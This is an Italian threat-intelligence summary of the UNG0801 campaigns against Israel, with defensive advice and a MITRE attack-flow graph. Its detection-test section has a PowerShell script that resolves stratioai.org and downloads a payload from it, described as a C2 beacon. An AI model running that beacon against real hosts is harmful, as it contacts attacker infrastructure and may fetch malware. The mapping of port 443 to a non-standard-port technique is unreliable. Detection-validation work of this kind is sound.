SOC Prime Bias: Critico

30 Dic 2025 16:40
newspaper icon Seqrite

UNG0801: Attività Minacciose Mirate a Israele Guidate da Spoofing delle Icone AV

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
UNG0801: Attività Minacciose Mirate a Israele Guidate da Spoofing delle Icone AV
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Riassunto

Il rapporto descrive due campagne collegate che utilizzano PDF e documenti Word malevoli per consegnare payload che simulano icone antivirus e prendono di mira organizzazioni israeliane. Un percorso rilascia PYTRIC, un impianto Python impacchettato con PyInstaller, mentre l’altro consegna RUSTRIC, un impianto basato su Rust lanciato tramite un documento Word con macro abilitate. Entrambi i payload raccolgono dettagli sull’host, eseguono comandi di sistema e sondano il software di sicurezza installato; PYTRIC include inoltre funzionalità distruttive. La consegna è guidata da allegati di spear-phishing e link ospitati sul cloud (incluso Dropbox), con Telegram utilizzato per il comando e controllo.

Indagine

SEQRITE Labs ha analizzato gli esche iniziali di phishing, estratto macro incorporate e ricostruito la catena di payload rilasciata. PYTRIC è stato confermato come un pacchetto PyInstaller con routine di scoperta e cancellazione file, e gli analisti hanno osservato le credenziali del bot Telegram associate a Backup2040. RUSTRIC è stato profilato come un binario Rust che controlla ventotto prodotti antivirus e attiva un payload codificato in esadecimale usando WMI. L’analisi dell’infrastruttura ha collegato la consegna a un link Dropbox e a un dominio che risolve a un indirizzo IP precedentemente legato a netvigil.org.

Mitigazione

Istruire gli utenti a trattare con cautela gli allegati PDF e Word non richiesti, specialmente i file presentati come strumenti di sicurezza o utility correlate agli antivirus. Configurare la sicurezza della posta elettronica per bloccare documenti con macro e per segnare o limitare gli URL che puntano a host di archiviazione cloud utilizzati per la consegna dei payload. Sugli endpoint, monitorare l’esecuzione di PyInstaller, la creazione di processi WMI insoliti e l’invocazione sospetta di utilità integrate come whoami, hostname e nslookup. Bloccare i domini e gli IP identificati come malevoli può ulteriormente interrompere il percorso di infezione.

Risposta

Se viene rilevata attività, isolare il sistema affetto, preservare i dati volatili e raccogliere i documenti malevoli per una selezione basata su hash. Fermare i processi sospetti avviati da WMI e rimuovere i payload rilasciati dalle posizioni comuni di staging, come la cartella Downloads. Eseguire una convalida forense per le attività di eliminazione o cancellazione file, reimpostare credenziali potenzialmente esposte e monitorare per le comunicazioni C2 su Telegram successive.

“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#c2f0c2 classDef malware fill:#ff9999 classDef process fill:#dddddd classDef operator fill:#ff9900 %% Action nodes attack_phishing[“<b>Azione</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br />Le vittime ricevono email con allegato PDF o Word malevolo.”] class attack_phishing action attack_user_exec[“<b>Azione</b> – <b>T1204.002 Esecuzione Utente: File Malevolo</b><br />La vittima apre il documento PDF o Word malevolo, avviando l’esecuzione.”] class attack_user_exec action attack_ingress_transfer[“<b>Azione</b> – <b>T1105 Trasferimento di Strumenti di Ingresso</b><br />Il PDF istruisce la vittima a scaricare un payload di secondo stadio da Dropbox.”] class attack_ingress_transfer action attack_exec_python[“<b>Azione</b> – <b>T1059.006 Interprete di Comandi e Script: Python</b><br />PYTRIC (eseguibile Python impacchettato con PyInstaller) viene eseguito sull’host.”] class attack_exec_python action attack_exec_vb[“<b>Azione</b> – <b>T1059.005 Interprete di Comandi e Script: Visual Basic</b><br />Le macro VBA nel documento Word decodificano e scrivono il payload finale su disco.”] class attack_exec_vb action attack_masquerade[“<b>Azione</b> – <b>T1036.005 Mascheramento: Corrispondenza del Nome o Posizione Legittima</b><br />I binari sono nominati per imitare fornitori di antivirus fidati (Check Point, SentinelOne).”] class attack_masquerade action attack_obfuscate[“<b>Azione</b> – <b>T1027 File o Informazioni Offuscati</b><br />Il payload è codificato in esadecimale all’interno della macro per evitare il rilevamento statico.”] class attack_obfuscate action attack_proxy_exec[“<b>Azione</b> – <b>T1218 Esecuzione Proxy del Binario di Sistema</b><br />Binari legittimi (wmic, whoami.exe, hostname.exe, nslookup.exe) vengono utilizzati per eseguire comandi.”] class attack_proxy_exec action attack_wmi[“<b>Azione</b> – <b>T1047 Strumentazione Gestione Windows</b><br />RUSTRIC viene lanciato tramite WMI (Win32_Process.Create).”] class attack_wmi action attack_sw_discovery[“<b>Azione</b> – <b>T1518.001 Scoperta del Software di Sicurezza</b><br />RUSTRIC enumera 28 prodotti antivirus/EDR controllando percorsi e processi conosciuti.”] class attack_sw_discovery action attack_process_discovery[“<b>Azione</b> – <b>T1057 Scoperta dei Processi</b><br />RUSTRIC elenca i processi in esecuzione sull’endpoint.”] class attack_process_discovery action attack_c2_web[“<b>Azione</b> – <b>T1071.001 Protocollo del Livello Applicazione: Protocolli Web</b><br />Gli impianti comunicano con il C2 tramite protocolli web standard.”] class attack_c2_web action attack_c2_port[“<b>Azione</b> – <b>T1571 Porta Non Standard</b><br />La comunicazione avviene su HTTPS sulla porta 443.”] class attack_c2_port action attack_subvert_trust[“<b>Azione</b> – <b>T1553 Sovversione dei Controlli di Fiducia</b><br />I binari sono camuffati con icone/branding di fornitori di sicurezza legittimi.”] class attack_subvert_trust action attack_impair_defenses[“<b>Azione</b> – <b>T1562.011 Danneggiamento delle Difese: Alert di Sicurezza Falsificati</b><br />Falsi avvisi di sicurezza rafforzano l’aspetto di fiducia dei binari malevoli.”] class attack_impair_defenses action %% Tool nodes tool_wmic[“<b>Strumento</b> – <b>Nome</b>: wmic<br /><b>Descrizione</b>: Utilità da linea di comando della Strumentazione Gestione Windows.”] class tool_wmic tool tool_whoami[“<b>Strumento</b> – <b>Nome</b>: whoami.exe<br /><b>Descrizione</b>: Fornisce il nome dell’utente corrente.”] class tool_whoami tool tool_hostname[“<b>Strumento</b> – <b>Nome</b>: hostname.exe<br /><b>Descrizione</b>: Restituisce il nome host della macchina.”] class tool_hostname tool tool_nslookup[“<b>Strumento</b> – <b>Nome</b>: nslookup.exe<br /><b>Descrizione</b>: Utilità di query DNS.”] class tool_nslookup tool %% File nodes file_malicious_pdf[“<b>File</b> – <b>Nome</b>: PDF Malevolo<br /><b>Scopo</b>: Vettore di consegna per l’istruzione iniziale.”] class file_malicious_pdf file file_malicious_word[“<b>File</b> – <b>Nome</b>: Word Malevolo<br /><b>Scopo</b>: Contiene macro VBA che decodifica il payload finale.”] class file_malicious_word file file_dropbox[“<b>File</b> – <b>Nome</b>: Link payload Dropbox<br /><b>Scopo</b>: Ospita eseguibile PYTRIC di secondo stadio.”] class file_dropbox file %% Malware nodes malware_pytric[“<b>Malware</b> – <b>Nome</b>: PYTRIC<br /><b>Descrizione</b>: Backdoor Python impacchettato con PyInstaller.”] class malware_pytric malware malware_rustric[“<b>Malware</b> – <b>Nome</b>: RUSTRIC<br /><b>Descrizione</b>: Componente eseguito tramite WMI usato per la scoperta e C2.”] class malware_rustric malware %% Operator node for branching op_and1((“AND”)) class op_and1 operator %% Connections attack_phishing u002du002d>|delivers| file_malicious_pdf attack_phishing u002du002d>|delivers| file_malicious_word file_malicious_pdf u002du002d>|opened by victim| attack_user_exec file_malicious_word u002du002d>|opened by victim| attack_user_exec attack_user_exec u002du002d>|triggers| attack_ingress_transfer attack_ingress_transfer u002du002d>|downloads| file_dropbox file_dropbox u002du002d>|provides| malware_pytric attack_user_exec u002du002d>|executes| attack_exec_vb attack_exec_vb u002du002d>|writes| malware_rustric attack_ingress_transfer u002du002d>|executes| attack_exec_python attack_exec_python u002du002d>|runs| malware_pytric malware_pytric u002du002d>|uses| attack_obfuscate malware_pytric u002du002d>|uses| attack_masquerade attack_obfuscate u002du002d>|supports| attack_proxy_exec attack_masquerade u002du002d>|supports| attack_proxy_exec attack_proxy_exec u002du002d>|calls| tool_wmic attack_proxy_exec u002du002d>|calls| tool_whoami attack_proxy_exec u002du002d>|calls| tool_hostname attack_proxy_exec u002du002d>|calls| tool_nslookup tool_wmic u002du002d>|launches| attack_wmi attack_wmi u002du002d>|executes| malware_rustric malware_rustric u002du002d>|performs| attack_sw_discovery malware_rustric u002du002d>|performs| attack_process_discovery attack_sw_discovery u002du002d>|feeds into| attack_c2_web attack_process_discovery u002du002d>|feeds into| attack_c2_web attack_c2_web u002du002d>|uses| attack_c2_port attack_c2_web u002du002d>|enables| attack_subvert_trust attack_c2_web u002du002d>|enables| attack_impair_defenses %% Styling class attack_phishing,attack_user_exec,attack_ingress_transfer,attack_exec_python,attack_exec_vb,attack_masquerade,attack_obfuscate,attack_proxy_exec,attack_wmi,attack_sw_discovery,attack_process_discovery,attack_c2_web,attack_c2_port,attack_subvert_trust,attack_impair_defenses action class tool_wmic,tool_whoami,tool_hostname,tool_nslookup tool class file_malicious_pdf,file_malicious_word,file_dropbox file class malware_pytric,malware_rustric malware class op_and1 operator “

Flusso di Attacco

Esecuzione Simulativa

Prerequisito: la verifica preliminare della Telemetria & Baseline deve essere superata.

Motivazione: questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare esattamente la telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errata.

  • NarraziOne dell’attacco & Comandi:
    L’avversario ha pre-registrato il dominio stratioai.org e lo ha configurato per risolvere a 159.198.68.25 (un VPS compromesso). Usando un one-liner PowerShell, iniziano un beacon C2 che scarica un piccolo payload e poi mantiene una shell inversa persistente. La connessione uscente viene effettuata su HTTPS (porta 443) per mescolarsi con il traffico normale, ma il firewall registra l’IP di destinazione e la query DNS, soddisfacendo la regola sigma.

  • Script Test di Regressione:

    # -------------------------------------------------
# Beacon C2 simulato per la validazione rilevamento
# -------------------------------------------------
# 1. Risolvere il dominio malevolo (forza query DNS)
$maliciousDomain = "stratioai.org"
$resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
Write-Host "Risolto $maliciousDomain a $($resolved -join ', ')"

# 2. Stabilire connessione HTTPS all'IP malevolo (C2)
$maliciousIP = "159.198.68.25"
$url = "https://$maliciousDomain/payload.bin"

try {
    $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
    Write-Host "Richiesta C2 riuscita, dimensione: $($response.ContentLength) byte"
} catch {
    Write-Error "Richiesta C2 fallita: $_"
}

# 3. OPZIONALE: Mantenere vivo il canale per 30 secondi
Start-Sleep -Seconds 30
# -------------------------------------------------

  • Comandi di Pulizia:

    # Rimuovere eventuali file temporanei (nessuno creato in questo script)
# Cancellare la cache DNS per evitare riutilizzo accidentale
ipconfig /flushdns
Write-Host "Pulizia completata."

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis